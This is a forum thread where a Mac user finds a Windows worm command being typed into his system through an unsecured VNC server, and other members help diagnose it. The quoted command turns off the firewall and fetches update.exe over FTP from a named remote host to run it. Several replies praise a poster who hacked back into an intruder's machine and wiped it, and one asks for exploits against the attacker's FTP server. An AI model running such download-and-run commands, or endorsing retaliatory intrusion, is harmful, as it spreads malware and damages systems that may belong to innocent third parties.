Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

OS X worm?

V

vd0t

macrumors regular
Original poster
Jun 7, 2005
115
0
I think I may have a worm on my Mac! Since a few days ago, I noticed that every few hours, the following message is typed automatically:

cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij 7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit

I don't think it will do any damage as it looks like its meant for Windows (look at update.exe). But I'm puzzled as to how it got to or runs on my Mac!

How do I get rid of this?

Thanks!
 
typed where? how did you get it? what programs are affected?

more info needed before the people with torches and pitchforks start their riots :p
 
vd0t said:
I think I may have a worm on my Mac! Since a few days ago, I noticed that every few hours, the following message is typed automatically:

cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij 7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit

I don't think it will do any damage as it looks like its meant for Windows (look at update.exe). But I'm puzzled as to how it got to or runs on my Mac!

How do I get rid of this?

Thanks!
Click to expand...
Check your Login Items (located under System Preferences -> Accounts) for anything strange running at startup. Also check your cron tables (an application like Cronnix makes this task much easier) and your launchd settings (use Lingon for this purpose) for anything set to automatically launch that you don't want launched.
 
vd0t said:
...echo open elterryer.serveftp.net...
Click to expand...

abuse@dyndns.com

some idiot's trying to do windows-y stuff on your mac. i suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted :D
 
It's typed anywhere! So if I have TextEdit open, it will type it there. If the cursor is an a file - it will rename that file. If I'm watching a movie on quicktime, it will attempt to type (I hear the keyboard beep sound).

I looked through my login items and don't see anything suspicious.
 
janey said:
abuse@dyndns.com

some idiot's trying to do windows-y stuff on your mac. i suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted :D
Click to expand...


That is just so beautiful....:)
 
synth3tik said:
That is just so beautiful....:)
Click to expand...
although i was being stupid about the easy-to-guess password (it was a throwaway account for testing), the guy was stupider for leaving behind so many passwords and sshing as root. i would have seen it eventually, but the first thing that tipped me off was little snitch blocking all sorts of stuff that only I'd usually be using. the guy even tried to use wget to download a copy of openssh to use..well, little snitch would block that too :D

i just sat around watching what he was doing until he stopped..then i deleted stuff. it was the funniest thing ever.
 
The hostname resolves to 72.244.39.101, which is registered to an ISP named Covad Communications in San Jose, California.

E-mail address to report abuse is abuse-isp@covad.com

Unfortunately this particular user does not have Telnet nor SSH running, but the FTP software identifies itself as "Serv-U FTP-Server v2.5e for WinSock" if anyone knows any exploits :)
 
janey said:
...
I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted.
Click to expand...

I like your style. :D That. is. brilliant.
 
I don't see anything suspicious in Activity Monitor.

I have Parallels installed with Windows XP (never had any problems in the past). And I installed Vine Server (VNC server) recently so I can access my Mac from my Windows PC. I'm thinking this may be the culprit. But still doesn't really make sense to me.

I have to leave for work and look more into this when I get home.
 
janey said:
abuse@dyndns.com

some idiot's trying to do windows-y stuff on your mac. i suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted :D
Click to expand...

THAT IS ABSOLUTELY BEAUTIFUL!

Nice job backhacking.... as long as you toasted the hacker's machine, rather than someone's 0wned box that he was using as a gateway.

vd0t said:
I don't see anything suspicious in Activity Monitor.

I have Parallels installed with Windows XP (never had any problems in the past). And I installed Vine Server (VNC server) recently so I can access my Mac from my Windows PC. I'm thinking this may be the culprit. But still doesn't really make sense to me.

I have to leave for work and look more into this when I get home.
Click to expand...

VNC is the attack vector. Do you have a password set for it? Good lord plug that hole before he realizes that your running a *NIX and starts using the appropriate commands!
 
I changed the password to my VNC server. It seems like everything is ok now.
 
janey said:
abuse@dyndns.com

some idiot's trying to do windows-y stuff on your mac. i suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted :D
Click to expand...

That really is precious :D
 
vd0t said:
I changed the password to my VNC server. It seems like everything is ok now.
Click to expand...

If your password for VNC was the same for any other services you use, I would strongly advice changing them as well. STRONGLY.
 
iBlue said:
I like your style. :D That. is. brilliant.
Click to expand...
headfuzz said:
That really is precious :D
Click to expand...
SC68Cal said:
THAT IS ABSOLUTELY BEAUTIFUL!

Nice job backhacking.... as long as you toasted the hacker's machine, rather than someone's 0wned box that he was using as a gateway.
Click to expand...

:D

it wasn't really backhacking...and there wasn't anything in terms of actual user data that i could see except suspicious looking files, some of which the idiot was trying to get onto my box.
 
I originally chose a short password - which I've used in the past with no problems. But now I changed it to something stronger. Lesson learned! Thanks all!
 
You must log in or register to reply here.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back